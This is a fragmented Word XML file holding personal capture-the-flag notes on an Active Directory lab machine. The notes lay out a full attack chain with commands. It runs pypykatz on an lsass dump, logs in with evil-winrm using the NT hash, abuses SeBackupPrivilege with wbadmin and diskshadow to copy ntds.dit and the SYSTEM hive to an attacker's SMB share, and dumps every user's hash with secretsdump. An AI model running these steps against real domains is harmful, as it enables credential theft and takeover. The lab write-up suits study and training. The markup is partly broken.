    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F8">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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shares of audit2020 we see we have access to forensics. Mounting this share, we enumerate. There are some user and password lists, but all the passwords are rabbit holes. The file most interesting to us is one called “lsass.DMP.” This is a file mimikatz reads in order to dump hashes. We need to unzip this DMP file (because it was packaged in a zip) and use a program to read lsass.DMP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F9">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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pypykatz to read lsass.DMP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FA">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>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Pypykatz lsa minidump lsass.DMP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FB">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="3"/>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Dumps the hashes stored in this file. The only one worth noting is svc_backup’s NT hash. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FC">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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svc_backup’s NT hash, we check to see if we can evil-winrm in. This turns out positive and we log in</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 Esc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FF">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privileges, we see we have the SeBackupPrivilege and SeRestorePrivilege</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000100">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we can potentially find some way to escalate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000101">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in kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000102">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support -user duck -password kek KEK  $(pwd)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000103">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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a smbserver with the user duck, password kek, and share KEK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000104">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in winrm:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000105">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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 use x: \\10.10.14.34\KEK /user:duck kek</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000106">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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box to my computer’s share. KEK is the share, duck is the user, and “kek” is the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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wbadmin start backup -backuptarget:\\10.10.14.34\kek123 -include:c:\windows\ntds\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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ntds directory is the “heart” of active directory that contains information such as user accounts. We are sending the backup data of this section to my kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000109">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executing the above wbadmin command, it will fail since the system wants to only send the backup to a NTFS/ReFS disk. To go around this, we need to create a disk on our host machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010A">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>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dd if=/dev/zero of=ntfs.disk bs=1024M count=2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010B">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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disk with 2GB of space</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010C">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>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losetup -fP ntfs.disk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010D">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>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losetup -a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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 disk we created</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>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Mkfs.ntfs /dev/loop2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000110">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we mount our own share. Need to make a directory called “smb” or whatever else you want where this ntfs disk exists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000111">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>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Mount /dev/loop2 smb/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112">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into the smb share and restart the smbserver inside</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000113">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above fails, so we are going to have to simply make our own smb share from samba on linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>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/etc/samba/smb.conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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the bottom where the share “print$” is and copy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000118">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="3"/>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6yy </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="3"/>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p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011A">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="4"/>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will copy the current line and the 5 under it for a total of 6 lines. P will “put” or paste the selection wherever the cursor is</w:t>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CONFUSED SO TRYING DIFFERENT PRIV ESC.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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 Esc with diskshadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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txt file with:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000121">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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pageBreakBefore w:val="0"/>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context persistent nowriters  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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metadata c:\windows\system32\spool\drivers\color\example.cab  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000124">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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verbose on  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000125">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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backup  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000126">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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volume c: alias mydrive  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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8">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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A">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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expose %mydrive% w:  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012B">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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backup  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012C">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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D">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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to windows then run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012E">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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Diskshadow /s script.txt </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012F">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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Script.txt is the txt file we just created</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000130">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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download and follow this github </w:t>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/giuliano108/SeBackupPrivilege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1">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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“SeBackupPrivilegeCmdLets.dll” and “SeBackupPrivilegeUtils.dll” to the box. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000132">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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on the box, do:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000133">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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Import-Module “both dll’s”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000134">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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this on any file. If you can copy a file to svc_backup’s folder and download it to linux and read it, then the imports were successful</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000135">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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we need to save the ntds.dit file and system.hive to then get hashes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000136">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\users\svc_backup\Documents\ntds.dit -Overwrite</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000137">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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 save HKLM\SYSTEM c:\users\svc_backup\Documents\system.hive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000138">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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these to our local machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000139">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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Dump hashes with impacket’s secretsdump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013A">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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./secretsdump -ntds ntds.dit -system system.hive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013B">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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target to LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013C">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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get the hashes for all users</w:t>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Pwn3d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000148">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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crackmapexec to get shares</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000149">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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Cme smb 10.10.10.192 --shares -u ‘anonymous’ -p ‘’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014A">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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feature called “smbget” which is similar to wget but for smb only</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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smbget smb://10.10.10.192/forensic/memory_analysis/lsass.zip -U=audit2020%password123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2.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://malicious.link/post/2017/reset-ad-user-password-with-linux/" TargetMode="External"/><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22.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.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image" Target="media/image4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/giuliano108/SeBackupPrivilege" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.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